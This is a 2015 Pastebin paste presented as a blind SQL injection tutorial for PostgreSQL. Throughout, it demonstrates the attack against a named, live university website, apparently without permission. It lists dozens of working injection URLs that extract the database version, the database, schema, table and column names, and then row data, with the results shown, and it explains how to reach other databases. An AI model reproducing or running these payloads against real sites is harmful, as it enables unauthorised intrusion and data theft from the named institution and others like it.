API tools faq
paste
Advertisement
Kyfx

Blind Sql injection tutorial

Kyfx
Mar 19th, 2015
543
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 14.44 KB | None | 0 0
raw download clone embed print report
  1. We have a live target: http://www.must.edu.eg/Reports/College_TT.php?College_Id=7
  2.  
  3. This tutorial consists on letting you know everything you have to know about Postgresql Sql Injection and much more when it comes to Blind Postgresql Sql Injection.
  4. I tried to Sql Inject this target using Popular tools such as Havij and Sqlmap but they failed while CppSqlInjector succeeded.
  5. Take your time to read, it’s kind of confusing if you’re not familiar with Postgresql but I did add a lot of information in here that should be really useful to everyone.
  6.  
  7. Getting the Version:
  8. http://www.must.edu.eg/Reports/College_TT.php?College_Id=7 AND (SELECT SUBSTR((SELECT version()),1,1))=CHAR(80)
  9. The pages loads just fine which means that the first letter of version() is =Char(80)=P which is the first letter of Postgresql.
  10.  
  11. Simple Part:
  12. This part stands for simplicity. It’s based on retrieving data from our Current Database and nothing else.
  13.  
  14. Getting the Current Database’s Length:
  15. http://www.must.edu.eg/Reports/College_TT.php?College_Id=7 AND (SELECT LENGTH(current_database()))> 10 (Error)
  16. http://www.must.edu.eg/Reports/College_TT.php?College_Id=7 AND (SELECT LENGTH(current_database()))= 7 (No Error)
  17. Which means that the length of our Current Database is 7.
  18.  
  19. Getting the Current Database’s name:
  20. http://www.must.edu.eg/Reports/College_TT.php?College_Id=7 AND (SELECT ascii(SUBSTR((SELECT current_database()),1,1))) > 114 (No Error)
  21. http://www.must.edu.eg/Reports/College_TT.php?College_Id=7 AND (SELECT ascii(SUBSTR((SELECT current_database()),1,1))) > 115 (Error)
  22. http://www.must.edu.eg/Reports/College_TT.php?College_Id=7 AND (SELECT ascii(SUBSTR((SELECT current_database()),1,1))) = 115 (No Error)
  23. Which means that our first Character is 115=s
  24.  
  25. TIP: To find the other characters you just have to change 1,1 to 2,1(If you don’t know why then you might want to check this link out: http://www.postgresql.org/docs/9.1/static/functions-string.html; that’s how the substr functions works.)
  26.  
  27. http://www.must.edu.eg/Reports/College_TT.php?College_Id=7 AND (SELECT ascii(SUBSTR((SELECT current_database()),2,1))) = 105 (No Error)
  28. 2nd character 105 = i
  29. 3rd character 115 = s
  30. 4th character 95 = _
  31. 5th character 114 = r
  32. 6th character 101 = e
  33. 7th character 103 = g
  34.  
  35. http://www.must.edu.eg/Reports/College_TT.php?College_Id=7 AND (SELECT ascii(SUBSTR((SELECT current_database()),8,1))) > 0 (Error)
  36. Why? Because the length of the database is 7 and you’re looking for the 8th character which makes no sense.
  37. So we just found our full Current Database which is = sis_reg
  38.  
  39. TIP: pg_database is a list that contains all the Databases.
  40.  
  41. Making sure we got the Right Database:
  42. http://www.must.edu.eg/Reports/College_TT.php?College_Id=7 AND (SELECT current_database()) = (SELECT CHR(115)||CHR(105)||CHR(115)||CHR(95)||CHR(114)||CHR(101)||CHR(103))
  43. This is simple, if the page loads normally then this means that current_database() = sis_reg.
  44. The page Loads with No Error which means we found the right characters and the right database.
  45.  
  46. Getting First Table from our Current Database:
  47. So we are only going to find the First Table of our Current Database which is: sis_reg
  48.  
  49. http://www.must.edu.eg/Reports/College_TT.php?College_Id=7 AND (SELECT ascii(SUBSTR((SELECT table_name FROM information_schema.tables LIMIT 1 OFFSET 0),1,1)))>120 (Error)
  50. http://www.must.edu.eg/Reports/College_TT.php?College_Id=7 AND (SELECT ascii(SUBSTR((SELECT table_name FROM information_schema.tables LIMIT 1 OFFSET 0),1,1)))=118 (No Error)
  51. TIP: If this doesn’t work then use the following:
  52.  
  53. http://www.must.edu.eg/Reports/College_TT.php?College_Id=7 AND (SELECT ascii(SUBSTR((SELECT table_name FROM information_schema.tables WHERE table_schema=current_schema() LIMIT 1 OFFSET 0),1,1)))>0
  54. It is the same but we just added table_schema=current_schema() to inform the database that we are requesting tables from that specific schema.
  55. 1st character 118 = v
  56. 2nd character 105 = i
  57. 3rd character 101 = e
  58. 4th character 119 = w
  59. 5th character 115 = s
  60.  
  61. Getting First Column from our Current Database’s First Table:
  62. http://www.must.edu.eg/Reports/College_TT.php?College_Id=7 AND (SELECT ascii(SUBSTR((SELECT column_name FROM information_schema.columns where table_name=CHR(118)||CHR(105)||CHR(101)||CHR(119)||CHR(115) LIMIT 1 OFFSET 0),1,1)))>118 (Error)
  63. http://www.must.edu.eg/Reports/College_TT.php?College_Id=7 AND (SELECT ascii(SUBSTR((SELECT column_name FROM information_schema.columns where table_name=CHR(118)||CHR(105)||CHR(101)||CHR(119)||CHR(115) LIMIT 1 OFFSET 0),1,1)))=116 (No Error)
  64. 1st character 116 = t
  65. 2nd character 97 = a
  66. 3rd character 98 = b
  67. 4th character 108 = l
  68. 5th character 101 = e
  69. 6th character 95 = _
  70. 7th character 99 = c
  71. 8th character 97 = a
  72. 9th character 116 = t
  73. 10th character 97 = a
  74. 11th character 108 = l
  75. 12th character 111 = o
  76. 13th character 103 = g
  77. The First Column of our Current Database’s First Table is: table_catalog
  78.  
  79. Retrieving Data:
  80. (Check the end of the Detailed Part of this Tutorial to know how to retrieve Data the right way)
  81.  
  82. Detailed Part:
  83. This part is all about detailed which will allow us to actually completely inject the website and retrieve everything we can find.
  84. Okay, so in the First Part, we only worked on getting the Current Database and to retrieving data from it but what if the Website has Lots of Database and the Information you’re looking for cannot be found in the Current Database? In this case, you have to follow this Part.
  85. This part is all about Finding All the Databases, Schemas, Tables, Columns etc…
  86. It’s kind complicated so you have focus on it.
  87.  
  88. Firstly, we have to see how many Database there is:
  89. http://www.must.edu.eg/Reports/College_TT.php?College_Id=7 AND (SELECT ascii(SUBSTR((SELECT datname FROM pg_database LIMIT 1 OFFSET 15),1,1)))>0 (No Error)
  90. So we’re checking if the 15th database has a NOT NULL first character and it does.
  91.  
  92. http://www.must.edu.eg/Reports/College_TT.php?College_Id=7 AND (SELECT ascii(SUBSTR((SELECT datname FROM pg_database LIMIT 1 OFFSET 18),1,1)))>0 (Error)
  93. So I checked it out and I realized that there is exactly 18 databases.
  94.  
  95. Anyways, lets try and get the name of the First Database:
  96. http://www.must.edu.eg/Reports/College_TT.php?College_Id=7 AND (SELECT ascii(SUBSTR((SELECT datname FROM pg_database LIMIT 1 OFFSET 0),1,1)))>90 (Error)
  97. http://www.must.edu.eg/Reports/College_TT.php?College_Id=7 AND (SELECT ascii(SUBSTR((SELECT datname FROM pg_database LIMIT 1 OFFSET 0),1,1)))=100 (No Error)
  98. So we’re trying to get the first character of the first database name that can be found in pg_database.
  99. 1st character 100 = d
  100. 2nd character 100 = d
  101.  
  102. http://www.must.edu.eg/Reports/College_TT.php?College_Id=7 AND (SELECT ascii(SUBSTR((SELECT datname FROM pg_database LIMIT 1 OFFSET 0),3,1)))>1 (Error)
  103. Which means that there is no 3rd character.
  104. Making sure we got the Right Database:
  105. http://www.must.edu.eg/Reports/College_TT.php?College_Id=7 AND (SELECT (LENGTH((SELECT datname FROM pg_database LIMIT 1 OFFSET 0))))=2 (No Error)
  106. Our first database's name is "dd".
  107. Getting Tables from our First Database:
  108. So we are only going to find the Tables of our First Database which is: dd
  109. And to do that we need to get into lots of trouble/
  110. Firstly, you should know that each Database creates multiply Schemas in which tables are put in.
  111. In MySql Injections things are easier because you don’t really care as much as you do in Postgresql about Schemas.
  112. In Postgresql, you have to find the Schema Name and the Database Name if you want to retrieve your specific Table.(You will understand better if you keep reading)
  113.  
  114. So firstly, we have to get the name of The First Schema that can be found in “dd”:
  115. http://www.must.edu.eg/Reports/College_TT.php?College_Id=7 AND (SELECT ascii(SUBSTR((SELECT schema_name FROM information_schema.schemata WHERE catalog_name=CHR(100)||CHR(100) LIMIT 1 OFFSET 0),1,1)))>0 (Error)
  116. TIP: Before we move on, you have to know that catalog_name stands for the name of the database. Now in our case, our First Database “dd” has no tables.
  117. So for the Sick of Knowledge we’re going to do everything on our Current Database which is sis_reg because in this Tutorial I don’t want to go ahead and find our Second Database.
  118.  
  119. http://www.must.edu.eg/Reports/College_TT.php?College_Id=7 AND (SELECT ascii(SUBSTR((SELECT schema_name FROM information_schema.schemata WHERE catalog_name=CHR(115)||CHR(105)||CHR(115)||CHR(95)||CHR(114)||CHR(101)||CHR(103) LIMIT 1 OFFSET 0),1,1)))>100 (Error)
  120. http://www.must.edu.eg/Reports/College_TT.php?College_Id=7 AND (SELECT ascii(SUBSTR((SELECT schema_name FROM information_schema.schemata WHERE catalog_name=CHR(115)||CHR(105)||CHR(115)||CHR(95)||CHR(114)||CHR(101)||CHR(103) LIMIT 1 OFFSET 0),1,1)))=112 (No Error)
  121. 1st character of our First Schema 112 = p
  122. 2nd character of our First Schema 103 = g
  123. 3rd character of our First Schema 95 = _
  124. 4th character of our First Schema 116 = t
  125. 5th character of our First Schema 101 = e
  126. 6th character of our First Schema 109 = m
  127. 7th character of our First Schema 112 = p
  128. 8th character of our First Schema 95 = _
  129. 9th character of our First Schema 51 = 3
  130. 10th character of our First Schema 57 = 9
  131. Our first Schema Name is: pg_temp_39
  132.  
  133. And for the Second Schema:
  134. http://www.must.edu.eg/Reports/College_TT.php?College_Id=7 AND (SELECT ascii(SUBSTR((SELECT schema_name FROM information_schema.schemata WHERE catalog_name=CHR(115)||CHR(105)||CHR(115)||CHR(95)||CHR(114)||CHR(101)||CHR(103) LIMIT 1 OFFSET 1),1,1)))>0 (No Error)
  135. As you can see we just increase our OFFSET from 0 to 1.
  136. We go no error, this means it does exists but I am not going to retrieve it; it really takes a long time to get all the characters.
  137. My point is proven, now you know what to do if you want the rest of the Schemas.
  138. Anyways, to continue this tutorial and to teach you more about “playarounds” in Blind Postgre Sql Injection, I am going to find the Current Schema in our Default Database and keep moving forward while using it.
  139.  
  140. Getting the Current Schema of our Default Database:
  141. http://www.must.edu.eg/Reports/College_TT.php?College_Id=7 AND (SELECT ascii(SUBSTR((SELECT current_schema() FROM information_schema.schemata WHERE catalog_name=current_database() LIMIT 1 OFFSET 0),1,1)))=112 (No Error)
  142. As you can see, we replace schema_name with current_schema() and we made our catalog_name=current_database().
  143. 1st character 112 = p
  144. 2nd character 117 = u
  145. 3rd character 98 = b
  146. 4th character 108 = l
  147. 5th character 105 = i
  148. 6th character 99 = c
  149. Current Schema of our Default Database is: public
  150.  
  151. Getting First Table from Our Current Schema:
  152. http://www.must.edu.eg/Reports/College_TT.php?College_Id=7 AND (SELECT ascii(SUBSTR((SELECT table_name FROM information_schema.tables WHERE table_schema=CHR(112)||CHR(117)||CHR(98)||CHR(108)||CHR(105)||CHR(99) LIMIT 1 OFFSET 0),1,1)))>120 (Error)
  153. http://www.must.edu.eg/Reports/College_TT.php?College_Id=7 AND (SELECT ascii(SUBSTR((SELECT table_name FROM information_schema.tables WHERE table_schema=CHR(112)||CHR(117)||CHR(98)||CHR(108)||CHR(105)||CHR(99) LIMIT 1 OFFSET 0),1,1)))=116 (No Error)
  154. 1st character 116 = t
  155. 2nd character 116 = t
  156. 3rd character 95 = _
  157. 4th character 99 = c
  158. 5th character 111 = o
  159. 6th character 117 = u
  160. 7th character 114 = r
  161. 8th character 115 = s
  162. 9th character 101 = e
  163. 10th character 115 = s
  164. 11th character 95 = _
  165. 12th character 108 = l
  166. 13th character 111 = o
  167. 14th character 99 = c
  168. 15th character 97 = a
  169. 16th character 116 = t
  170. 17th character 105 = i
  171. 18th character 111 = 0
  172. 19th character 110 = n
  173. 20th character 115 = s
  174. 21th character 95 = _
  175. 22th character 97 = a
  176. 23th character 108 = l
  177. 24th character 108 = l
  178. 25th character 95 = _
  179. 26th character 115 = s
  180. 27th character 101 = e
  181. 28th character 109 = m
  182. 29th character 101 = e
  183. 30th character 115 = s
  184. 31th character 116 = t
  185. 32th character 101 = e
  186. 33th character 114 = r
  187. 34th character 115 = s
  188. 35th character 95 = _
  189. 36th character 116 = t
  190. 37th character 98 = b
  191. 38th character 108 = l
  192. 39th character 48 = 0
  193. We got this: tt_courses_locations_all_semesters_tbl0
  194.  
  195. Getting First Column from Our First Table in Current Schema:
  196. http://www.must.edu.eg/Reports/College_TT.php?College_Id=7 AND ascii(SUBSTR((SELECT column_name from information_schema.columns WHERE table_name=CHR(116)||CHR(116)||CHR(95)||CHR(99)||CHR(111)||CHR(117)||CHR(114)||CHR(115)||CHR(101)||CHR(115)||CHR(95)||CHR(108)||CHR(111)||CHR(99)||CHR(97)||CHR(116)||CHR(105)||CHR(111)||CHR(110)||CHR(115)||CHR(95)||CHR(97)||CHR(108)||CHR(108)||CHR(95)||CHR(115)||CHR(101)||CHR(109)||CHR(101)||CHR(115)||CHR(116)||CHR(101)||CHR(114)||CHR(115)||CHR(95)||CHR(116)||CHR(98)||CHR(108)||CHR(48) and table_schema=current_schema() LIMIT 1 OFFSET 0),1,1))>120 (Error)
  197. http://www.must.edu.eg/Reports/College_TT.php?College_Id=7 AND ascii(SUBSTR((SELECT column_name from information_schema.columns WHERE table_name=CHR(116)||CHR(116)||CHR(95)||CHR(99)||CHR(111)||CHR(117)||CHR(114)||CHR(115)||CHR(101)||CHR(115)||CHR(95)||CHR(108)||CHR(111)||CHR(99)||CHR(97)||CHR(116)||CHR(105)||CHR(111)||CHR(110)||CHR(115)||CHR(95)||CHR(97)||CHR(108)||CHR(108)||CHR(95)||CHR(115)||CHR(101)||CHR(109)||CHR(101)||CHR(115)||CHR(116)||CHR(101)||CHR(114)||CHR(115)||CHR(95)||CHR(116)||CHR(98)||CHR(108)||CHR(48) and table_schema=current_schema() LIMIT 1 OFFSET 0),1,1))=115 (No Error)
  198. 1st character 115 = s
  199. 2nd character 117 = u
  200. 3rd character 98 = b
  201. 4th character 106 = j
  202. 5th character 101 = e
  203. 6th character 99 = c
  204. 7th character 116 = t
  205. 8th character 95 = _
  206. 9th character 105 = i
  207. 10th character 100 = d
  208. So the name of our First Column from Our First Table in Current Schema is: subject_id
  209. If you are working with something other than current_schema then you obviously just have to replace current_schema() with the Oracle CHR of your Schema Name.
  210.  
  211. Retrieving Data from that Column:
  212. http://www.must.edu.eg/Reports/College_TT.php?College_Id=7 AND (SELECT ascii(SUBSTR((SELECT subject_id FROM tt_courses_locations_all_semesters_tbl0 LIMIT 1 OFFSET 0),1,1))) > 0 (No Error)
  213. TIP: If this didn’t work then use the following more detailed query:
  214.  
  215. http://www.must.edu.eg/Reports/College_TT.php?College_Id=7 AND (SELECT ascii(SUBSTR((SELECT subject_id FROM sis_reg.public.tt_courses_locations_all_semesters_tbl0 LIMIT 1 OFFSET 0),1,1))) > 0
  216. As you can see we replaced the simple tt_courses_location_all_semesters_tbl0 by sis_reg.public.tt_courses_locations_all_semesters_tbl0 which stands for database.schema.table and that’s exactly what you should be using if you’re trying to extract data from different databases/schemas/tables instead of the current ones.
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!